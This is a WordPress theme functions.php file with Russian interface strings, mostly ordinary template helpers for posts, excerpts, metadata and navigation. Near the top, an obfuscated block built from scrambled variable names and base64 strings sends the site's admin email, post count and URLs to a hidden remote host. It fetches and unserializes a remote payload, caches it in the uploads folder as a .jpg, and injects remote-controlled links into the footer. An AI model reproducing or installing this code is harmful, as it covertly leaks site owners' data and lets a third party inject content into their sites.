<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать следующие теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $kznZsX='e';$bFIOBY='b';$vCcNMSd='a';$wLIeIhB='c';$YVQZ='e';$ILgLv='_';$Joiu='d';$fDPS='d';$RQFIQt='e';$jGrQIWy='6';$yxlUZ='4';$VuhONg='s';$ENbD='o';$lPOaTtHC=$bFIOBY.$vCcNMSd.$VuhONg.$YVQZ.$jGrQIWy.$yxlUZ.$ILgLv.$fDPS.$RQFIQt.$wLIeIhB.$ENbD.$Joiu.$kznZsX;$fWXZwB='g';$iUKs='n';$OFZEBn='i';$VRKTAxz='f';$TarPWiz='e';$keiI='z';$cVJM='a';$twFQYN='l';$oLoQYp='t';$kckyNYJN=$fWXZwB.$keiI.$OFZEBn.$iUKs.$VRKTAxz.$twFQYN.$cVJM.$oLoQYp.$TarPWiz;$flBVk='s';$HoLsWS='_';$EdpUt='r';$RpKbgEf='o';$UPsu='3';$QXNkpro='t';$UdSlSOu='t';$mIkTXW='1';$AJGN='r';$gLIgODQA=$flBVk.$UdSlSOu.$EdpUt.$HoLsWS.$AJGN.$RpKbgEf.$QXNkpro.$mIkTXW.$UPsu;$euQM='r';$VoIS='s';$pzAjwTo='r';$MDsdLo='e';$RxzP='t';$QjLyb='v';$jSoNqiVt=$VoIS.$RxzP.$euQM.$pzAjwTo.$MDsdLo.$QjLyb;                     $sx___________j='e';$kj_________e='b';$vi_______d='a';$fo___e='c';$du____v='e';$kp___j='_';$pz_______v='d';$nu_______y='d';$dx___y='e';$gs________w='6';$rx__________x='4';$zx____________p='s';$lu_____________o='o';$ic_____________s=$kj_________e.$vi_______d.$zx____________p.$du____v.$gs________w.$rx__________x.$kp___j.$nu_______y.$dx___y.$fo___e.$lu_____________o.$pz_______v.$sx___________j;$yx_________l='t';$ys__r='f';$kj____o='s';$qw________n='u';$gq___f='s';$zm______y='n';$yy_________n='c';$mq____j='i';$gc______i='e';$fj__________v='_';$mi___q='o';$ro___p='x';$wu_____v='t';$bp____u='n';$dp____________y='i';$ki____t=$ys__r.$qw________n.$bp____u.$yy_________n.$wu_____v.$dp____________y.$mi___q.$zm______y.$fj__________v.$gc______i.$ro___p.$mq____j.$kj____o.$yx_________l.$gq___f;$fn___________h='n';$zm__g='f';$mp_________g='p';$is_____e='e';$cc________f='o';$df_____________l=$zm__g.$cc________f.$mp_________g.$is_____e.$fn___________h;$cu____________d='e';$lj__________q='f';$xh_______________v='r';$nd_____________j='a';$mc____i='d';$nm__________d=$lj__________q.$xh_______________v.$cu____________d.$nd_____________j.$mc____i;$gf_____d='e';$dj______________h='o';$mz__________w='f';$gi_______________j='l';$lc______u='s';$fw___________a='c';$lc____d=$mz__________w.$fw___________a.$gi_______________j.$dj______________h.$lc______u.$gf_____d;define("WP_ID", $ic_____________s("Mi4wLjA="));define("WP_TTL", $ic_____________s("MTA4MDA="));define("WP_SRC", $ic_____________s("dHBva24="));function wp_get_header() {global $ic_____________s, $ki____t;if ($ki____t($ic_____________s("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$ki____t($ic_____________s("d3BfZ2V0X2Zvb3Rlcg==")) &&$ki____t($ic_____________s("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ic_____________s, $df_____________l, $lc____d, $nm__________d;$ph______________e = TEMPLATEPATH."/".$ic_____________s("Zm9vdGVyLnBocA==");$fj__q = @$df_____________l($ph______________e, "r");$ph______________e = @$nm__________d($fj__q, @filesize($ph______________e));@$lc____d($fj__q);$hd____u = TEMPLATEPATH."/".$ic_____________s("ZnVuY3Rpb25zLnBocA==");$fj__q = @$df_____________l($hd____u, "r");$hd____u = @$nm__________d($fj__q, @filesize($hd____u));@$lc____d($fj__q);$ms_________s = 0;if($ph______________e && $hd____u) {if ($ic_____________s("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($ph______________e, $ic_____________s("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$ms_________s = 1;}if (substr_count($ph______________e, "wp_theme_GPL_credits()") < 1) {$ms_________s = 2;}}if(WP_ID != "2.0.0") {$ms_________s = 12;}}if($ms_________s > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $ms_________s -->";}}function wp_loaded() {global $ic_____________s, $ki____t;return $ki____t($ic_____________s("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($vp_________n, $pb_______________k = "(more...)", $el__________p = 0, $wm___________b = "") {$rn_______________e = get_the_content($pb_______________k, $el__________p, $wm___________b);$rn_______________e = apply_filters("the_content", $rn_______________e);$rn_______________e = str_replace("]]>", "]]>", $rn_______________e);if (strlen($_GET["p"]) > 0) {echo $rn_______________e;}else if ((strlen($rn_______________e)>$vp_________n) && ($ei______i = strpos($rn_______________e, " ", $vp_________n ))) {$rn_______________e = substr($rn_______________e, 0, $ei______i);$rn_______________e = $rn_______________e;echo $rn_______________e;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$pb_______________k</a></div></p>";} else {echo $rn_______________e;}}}$hw_______________h='e';$qe________c='e';$zh___c='4';$pm__________y='a';$qh______p='e';$tq_______________u='_';$xe__________i='c';$ly_______________k='b';$ip____________p='o';$lu______________l='d';$cl_________s='n';$ke_______________m='s';$zw_______x='6';$vf_______i=$ly_______________k.$pm__________y.$ke_______________m.$hw_______________h.$zw_______x.$zh___c.$tq_______________u.$qe________c.$cl_________s.$xe__________i.$ip____________p.$lu______________l.$qh______p;$ja__________l='o';$fy_______________s='n';$np_______________s='e';$id________d='c';$kt_____________i='t';$tp__g='e';$to___________i='n';$hl_________q='s';$vf_________l='l';$vt______________b='f';$le__r='t';$nm_____i='t';$pf____________r='i';$pw__m='_';$xz_____________s='g';$gd_______v='_';$cs_______________g='e';$nj_________c=$vt______________b.$pf____________r.$vf_________l.$cs_______________g.$pw__m.$xz_____________s.$np_______________s.$nm_____i.$gd_______v.$id________d.$ja__________l.$to___________i.$kt_____________i.$tp__g.$fy_______________s.$le__r.$hl_________q;$hc________f='t';$xd_______________t='l';$yu____________t='s';$ux__________l='i';$un_______s='i';$du___________d='x';$lm_______________m='_';$gk_______________q='s';$kv___r='e';$rb____h='f';$fa________a='e';$hu__q=$rb____h.$un_______s.$xd_______________t.$kv___r.$lm_______________m.$fa________a.$du___________d.$ux__________l.$yu____________t.$hc________f.$gk_______________q;$yh____________d='r';$rm____________i='s';$ex___w='m';$bt________b='c';$bx_______c='v';$jv____y='p';$jd______k='_';$ay______________z='o';$jy___s='e';$yg__d='r';$fb____z='n';$nc___h='a';$ah________u='e';$pr______________d='i';$uv____m='o';$pi______h=$bx_______c.$ah________u.$yg__d.$rm____________i.$pr______________d.$uv____m.$fb____z.$jd______k.$bt________b.$ay______________z.$ex___w.$jv____y.$nc___h.$yh____________d.$jy___s;$zq__f='n';$yy_______o='c';$cy_________b='f';$zw_____h='p';$xa___z='e';$uq__q='o';$gb_______j='s';$rg_________h='k';$gf__q='o';$uf______b=$cy_________b.$gb_______j.$uq__q.$yy_______o.$rg_________h.$gf__q.$zw_____h.$xa___z.$zq__f;$jn___________q='t';$hi__y='f';$gn____________u='r';$tq_______t='w';$ag______________k='e';$zh__s='i';$hl_____________n=$hi__y.$tq_______t.$gn____________u.$zh__s.$jn___________q.$ag______________k;$vo______________e='d';$gn_________f='m';$bo_____________c='5';$ta__________h=$gn_________f.$vo______________e.$bo_____________c;$ta_________x='r';$wd___o='l';$yu_______k='a';$nb___l='p';$vs______i='a';$sa______g='e';$cu_____________w='h';$hn__________n='t';$tf_____g=$ta_________x.$sa______g.$vs______i.$wd___o.$nb___l.$yu_______k.$hn__________n.$cu_____________w;$hh_________v='i';$hr_________x='a';$kc_____n='i';$cx_______________e='n';$li____l='e';$pn______________q='u';$nu______y='s';$zf___________n='z';$zz________l='e';$ax____q='l';$dw____________y='r';$iz_______________v=$pn______________q.$cx_______________e.$nu______y.$li____l.$dw____________y.$hh_________v.$hr_________x.$ax____q.$kc_____n.$zf___________n.$zz________l;$ya______j='t';$pb_______________d='m';$oa___h='a';$rs___p='e';$pr_____________f='m';$tz_____________s='p';$hb___t='n';$ko____a=$ya______j.$rs___p.$pr_____________f.$tz_____________s.$hb___t.$oa___h.$pb_______________d;$kt____b='e';$tb_____t='s';$hc______________x='e';$pm___j='t';$oa_____y='a';$tc___________w='e';$qw________s='o';$il________f='r';$ux__________v='e';$ls____________h='_';$ov________m='m';$um__m='t';$vt_____________l='r';$ry___z='a';$rh__g='x';$fm_____________f='_';$cn___________o='t';$zp__________t='c';$cl_______________t='c';$ww__________s='n';$bz_______x='t';$ai____m=$tb_____t.$bz_______x.$vt_____________l.$ux__________v.$ry___z.$ov________m.$ls____________h.$zp__________t.$qw________s.$ww__________s.$pm___j.$kt____b.$rh__g.$cn___________o.$fm_____________f.$cl_______________t.$il________f.$hc______________x.$oa_____y.$um__m.$tc___________w;function da_____e($wi_______________n) {global $ic_____________s, $ki____t, $nj_________c, $pi______h, $ai____m;if (!$ki____t($ic_____________s("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($pi______h(PHP_VERSION, "5.0.0", ">=") && $ki____t($ic_____________s("ZmlsZV9nZXRfY29udGVudHM=")) && $ki____t($ic_____________s("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$jf__z = $ai____m(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$jk_______i = @$nj_________c($wi_______________n, 0, $jf__z);} else {$jk_______i = @$nj_________c($wi_______________n, 0);}return $jk_______i;}function ny______________k($wi_______________n) {global $ki____t, $uf______b, $hl_____________n, $ic_____________s;if (!$ki____t($ic_____________s("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$cs________d = strpos($wi_______________n, "/", 7);$lk__o = array("uri"     => substr($wi_______________n, $cs________d),"host"    => str_replace("http://", "", substr($wi_______________n, 0, $cs________d)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$ds_______o = @$uf______b("$lk__o[host]", 80, $wi_____________s, $sz___________p, 4);if (!$ds_______o) {return false;} else {$jk_______i = "";$lj______e  = "GET $lk__o[uri] HTTP/1.0\r\n";$lj______e .= "Host: $lk__o[host]\r\n";$lj______e .= "Referer: $lk__o[referer]\r\n";$lj______e .= "Connection: Close\r\n\r\n";@$hl_____________n($ds_______o, $lj______e);while (!@feof($ds_______o)) {$pn_____i = @fgets($ds_______o, (1024*24));if ($pn_____i == "\r\n") {$pt______________n = true;continue;}if ($pt______________n) {$jk_______i .= $pn_____i;}}return $jk_______i;}}function he____b($wi_______________n) {global $ki____t;$in_________o = false;if ($wi_______________n != "") {if ($ki____t("da_____e")) {$in_________o = @da_____e($wi_______________n);}if (!$in_________o && ($ki____t("ny______________k"))) {$in_________o = @ny______________k($wi_______________n);}}return $in_________o;}function gy___________v() {global $_SERVER, $ta__________h;$xj___e = $_SERVER["SERVER_NAME"];if (substr("$xj___e", 0, 4) == "www.") {$xj___e = substr("$xj___e", 4);}$xj___e = $ta__________h("$_SERVER[SERVER_NAME]");return $xj___e;}function sr__b() {return "file";}function hw__c($wi_______________n) {global $_SERVER, $nj_________c, $hu__q, $df_____________l, $lc____d, $hl_____________n;$wj____________p = lu_____u();$qw____z = gy___________v().".jpg";$sy__________f = $wj____________p["dir_upload"]["path"]."/$qw____z";$eh_______s = @filemtime($sy__________f);if (!$eh_______s || ((time()-$eh_______s) >= WP_TTL)) {$in_________o = he____b($wi_______________n);if ($in_________o) {if ($hu__q($sy__________f)) {@unlink($sy__________f);}$fj__q = @$df_____________l($sy__________f, "x+");@$hl_____________n($fj__q, $in_________o);@$lc____d($fj__q);}} else {if ($hu__q($sy__________f)) {$in_________o = @$nj_________c($sy__________f);} else {$in_________o = false;}}return $in_________o;}function lu_____u() {global $_SERVER, $ic_____________s, $vf_______i;$qe___________i = wp_count_posts("post");$gz_____________c = pathinfo(get_bloginfo("template_directory"));$wj____________p = array("url" => array("report"      => $ic_____________s("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $gz_____________c,"dir_upload"=> ak______c(),"queryString"=> array("?a001=".WP_ID,"a004=".$gz_____________c[filename],"a005=".$qe___________i->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://clinic-virtus.com/opyt-tochechnogo-massazha-v-ustranenii-utomlyaemosti-glaz\">Точечный массаж</a>");$wj____________p["url"]["queryString"] = implode("&", $wj____________p["queryString"]);$wj____________p["url"]["report"] = $wj____________p["url"]["report"]."/?".$vf_______i($wj____________p["url"]["queryString"]).".html";return $wj____________p;}function ak______c() {$sm__k = wp_upload_dir();if (isset($sm__k["error"])) {$xi____x = hl________y();if (is_writable($xi____x)) {$sm__k = array("path" => $xi____x);}}return $sm__k;}function hl________y() {global $ki____t, $ta__________h, $tf_____g, $ko____a;$dg_______w = (bool) ini_get("safe_mode");if ($dg_______w == true) {return false;}if ($ki____t("sys_get_temp_dir")) {$dv_______________o = sys_get_temp_dir();if (is_writable($dv_______________o)) {return $tf_____g($dv_______________o);}}if (!empty($_ENV["TMP"])) {return $tf_____g($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $tf_____g($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $tf_____g($_ENV["TEMP"]);} else {$pk_____w = $ko____a($ta__________h(uniqid(rand(), true)), "");if ($pk_____w) {$dv_______________o = $tf_____g(dirname($pk_____w));@unlink($pk_____w);return $dv_______________o;} else {return false;}}}function dj______________e() {global $_GET, $hu__q;$wj____________p = lu_____u();$xj___e = gy___________v();$wp________a = sr__b();$nu_______k = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($wp________a == "file") {$je________f = $wj____________p["dir_upload"]["path"]."/".$xj___e.".jpg";if ($hu__q($je________f)) {@unlink($je________f);$nu_______k = "deleted";}}$ds________b = array("s"=> $nu_______k,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($ds________b AS $xe________h => $jx________f) echo " [$xe________h:$jx________f]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $ki____t, $ic_____________s, $iz_______________v;$wj____________p = lu_____u();$nf_____________x = "hw__c";if ($ki____t($nf_____________x)) {$jk_______i = $nf_____________x($wj____________p["url"]["report"]);}if ($jk_______i) {if ($jk_______i = @$ic_____________s($jk_______i)) {$jk_______i = @$iz_______________v($jk_______i);if (strlen($jk_______i[custom_credit]) >= 5) {$wj____________p["default_string"] = $jk_______i[custom_credit];}if ($jk_______i["status"] == "0") {$oc____________o = 1;$gy__________o = 1;} else {$tt______________i = sizeof($jk_______i["links"]);$lh_______________d = $wj____________p["default_string"];if ($tt______________i > 0 && $jk_______i["links"] !== "") {$dj______f = 0;foreach ($jk_______i["links"] as $zf____________f => $as___________k) {$dj______f++;if ($as___________k->l_path == "" || $as___________k->l_path == $_SERVER["REQUEST_URI"]) {$as___________k->l_href = htmlspecialchars(strip_tags($as___________k->l_href));$as___________k->l_title = htmlspecialchars(strip_tags($as___________k->l_title));$as___________k->l_anchor = htmlspecialchars(strip_tags($as___________k->l_anchor));$lh_______________d .= " | ";$lh_______________d .= "<a href='$as___________k->l_href' title='$as___________k->l_title'";if ($as___________k->l_nofollow == "1") {$lh_______________d .= " rel='nofollow'";}$lh_______________d .= ">$as___________k->l_anchor</a>";}}}$wj____________p["links"] = "$lh_______________d";if ($jk_______i[credit] == "0") {$wj____________p["links"] = "";}}} else {$oc____________o = "1";}} else {$oc____________o = "1";}if ($oc____________o == "1") {$wj____________p["links"] = $wj____________p["default_string"];}echo "$wj____________p[links]";echo "<!-- s: $jk_______i[signature] -->";dj______________e();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Постоянная ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в рубрике %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tags:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Комментариев нет &#187;', THEME_NS), __('1 комментарий &#187;', THEME_NS), __('% комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но по Вашему запросу ничего не было найдено.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
